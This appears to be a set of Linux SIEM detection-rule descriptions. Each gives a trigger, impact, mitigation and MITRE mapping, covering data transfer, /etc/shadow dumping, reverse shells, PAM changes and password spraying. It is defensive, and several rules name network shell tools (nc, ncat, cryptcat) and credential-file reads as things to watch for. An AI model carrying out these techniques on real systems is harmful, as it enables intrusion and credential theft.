This alert triggers whenever anomalous data transfer takes place within a short interval of time on a Linux system using command line tools such as wget, scp, rsync, ftp, sftp. Wget is an online control tool intended to transfer files via the HTTP, HTTPS protocols. SCP is a file transfer tool between two posts based on SSH which can guarantee you secured exchanges. Rsync is a file synchronization tool on a control line between 2 directories regardless of their location. FTP is the traditional file transfer protocol. It's a basic way of using the Internet to share files. SFTP (or Secure File Transfer Protocol) is an alternative to FTP that also allows you to transfer files but adds a layer of security to the process. Impact After a threat actor gains initial access to a Linux system, they can download malicious scripts, and tools or transfer data to be persistent, escalate privileges, or exfiltrate data from the system. Mitigation Check if the user is aware of the operations performed. if not, investigate it further. MITRE Tactic: TA0011 MITRE Technique: T1105

This alert triggers whenever an action is performed on the file containing the bash command history on a Linux system. A user can either view the command history or delete it. Note: For this alert, the threshold value set is 3 times in 20 minutes. You can modify this threshold value as per your requirements. Impact After completing an attack on a Linux system, attackers may attempt to delete the command history. They do it to remove their tracks and avoid detection. Mitigation Validate if the action performed was authorized and that the user is aware of it. If not, investigate it further. MITRE Tactic: TA0103 MITRE Technique: T0872

This alert triggers whenever kernel module-related activities such as loading, unloading, etc. are observed on a Linux system. Impact A threat actor may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. When used maliciously, LKMs can be a type of kernel-mode Rootkit that run with the highest operating system privilege. Mitigation Check if the commands related to kernel modules are run legitimately by a user. If the user is not aware of the activity, revert the actions and investigate it further. MITRE Tactic: TA0003 MITRE Technique: T1547

This alert triggers whenever someone attempts to view or dump the contents of "/etc/passwd" or "/etc/shadow" files on a Linux system. Impact A threat actor may attempt to dump the OS credentials to perform password cracking. Mitigation Check if the user who accesses these files is authorized to do so. if not, investigate it further. Additionally, administrators should follow best practices in restricting access to privileged accounts to avoid hostile programs from accessing such sensitive information. MITRE Tactic: TA0006 MITRE Technique: T1003

This alert triggers whenever a user uses SSH-authorized keys on a Linux system. SSH key pairs are two cryptographically secure keys that can be used to authenticate a client to an SSH server. Each key pair consists of a public key and a private key. When communicating to a machine via SSH, a user can authenticate if their private key is considered trustworthy by the server and added to the authorized_keys file, or if their private key corresponds to a public key stored in the server. Impact After a threat actor gains initial access to a Linux system, they can either access readable private SSH keys and use them to authenticate or access writable public SSH keys and add their own key to authenticate. If readable private keys or writable public keys are present on the machine, this could allow an attacker to escalate privileges to root. Mitigation Validate if the usage of the SSH_authorized key is legitimate. If not, investigate it further. Additionally, make sure that no copies of the private key are distributed. The authorized_keys file should only be editable by the owner of the file or by the root. MITRE Tactic: TA0003 MITRE Technique: T1098

This alert triggers whenever the system date and time are changed. Impact A threat actor may alter the time on a Linux system to prevent those systems from synchronizing their clocks. Mitigation Validate if the action performed was authorized. If not, revert the action and investigate it further. MITRE Tactic: TA0005 MITRE Technique: T1070

This alert triggers whenever data encoding using base64 or execve is observed in a Linux system. Impact A threat actor may encode data to make the content of command and control traffic more difficult to detect. Mitigation If data encoding is observed on a Linux machine, validate if it is for a legitimate reason. If not, investigate it further. MITRE Tactic: TA0011 MITRE Technique: T1132

This alert triggers when the Ubuntu firewall is disabled and is in an inactive state. Impact An adversary may disable the firewall on an Ubuntu machine to avoid detection. Once they disable the firewall, they can bypass security measures put in place and carry out their activities. Mitigation Investigate the cause behind disabling the firewall and check with the user who performed this action. Make sure to enable the firewall again. MITRE Tactic: TA0005 MITRE Technique: T1562

This alert triggers when a user attempts to modify pluggable authentication modules (PAM) on a Linux machine. Linux Pluggable Authentication Modules is a suite of libraries that allows a Linux system administrator to configure methods to authenticate users. It provides a flexible and centralized way to switch authentication methods for secured applications by using configuration files instead of changing application code. Impact Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. Mitigation Check if the user is aware of the modification of the files associated with PAM. If not, revert the action and investigate further. MITRE Tactic: TA0006 MITRE Technique: T1556 MITRE Sub-Technique: 003

This alert triggers when critical bash commands such as 'cat', 'rm', 'nc', 'ncat', 'netcat', 'useradd', 'cryptcat', trap, and grep, etc. are run on a Linux machine. Impact Running these critical Bash commands on Linux machines is a common tactic used by attackers to achieve various malicious objectives, ranging from gaining unauthorized access to systems to carrying out disruptive or destructive attacks. Mitigation Check if the user is aware of the commands executed. If not, investigate it further. MITRE Tactic: TA0002 MITRE Technique: T1059

This alert triggers whenever a Python or a Bash reverse shell command is executed in a Linux environment. Impact Reverse shells allow attackers to open ports to the target machines, forcing communication and enabling a complete takeover of the target machine. Mitigation Check if the user is aware of the command executed. If not, investigate further for any subsequent malicious activities in the network. Please see the below link to learn more about reverse shell and mitigation techniques: https://www.imperva.com/learn/application-security/reverse-shell/ MITRE Tactic: TA0002 MITRE Technique: T1059

This alert triggers whenever a user configures kernel parameters on a Linux system by using the sysctl command and by modifying the configuration files in the /etc/sysctl.d/ directory. Impact A threat actor may modify the kernel to automatically execute malicious programs on system boot and maintain persistence in the network. Mitigation Check if any modifications done are legitimate or not. If the user is not aware of the activity, revert the action and investigate further. MITRE Tactic: TA0003 MITRE Technique: T1547

This alert triggers if there are no logs in the last 12 hours for Linux in the customer account. Note- This alert should be configured for relevant apps & subsystems. Impact Disabling logging is a tactic that adversaries might employ as part of various MITRE ATT&CK techniques to avoid detection, cover their tracks, or impede incident response investigations. Mitigation Address logging concerns to ensure comprehensive monitoring within the Coralogix SIEM system. MITRE Tactic: TA0005 MITRE Technique:T1562

This alert triggers whenever suspicious SSH / SSHD error messages are seen that indicate a fatal or suspicious error that could be caused by exploiting attempts Impact Observing suspicious SSHD (Secure Shell Daemon) errors on a Linux system can indicate potential security threats or issues that need attention. Mitigation Investigate if these error messages are due to some legitimate operations. If not, investigate further for any malicious actions performed. MITRE Tactic: TA0008 MITRE Technique: T1021 MITRE Sub-Technique: 004

This alert triggers whenever a malicious actor makes a buffer overflow attempt. This alert checks for four common indicators of buffer overflow. Impact Buffer overflow attacks pose significant risks to the security, integrity, and availability of Linux systems and the data they contain. Mitigation Check if the user is aware of the commands executed. If not, investigate it further. MITRE Tactic: TA0001 MITRE Technique: T1190

This alert triggers whenever there is a possible password spraying attempt. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. Impact Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Mitigation Check if the login failures were a known activity. If not, investigate further for malicious activity and a successful login from the same source IP address. Additionally, Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Use multi-factor authentication. Where possible, also enable multi-factor authentication on externally facing services. MITRE Tactic: TA0006 MITRE Technique: T1110 MITRE Sub-Technique: 003"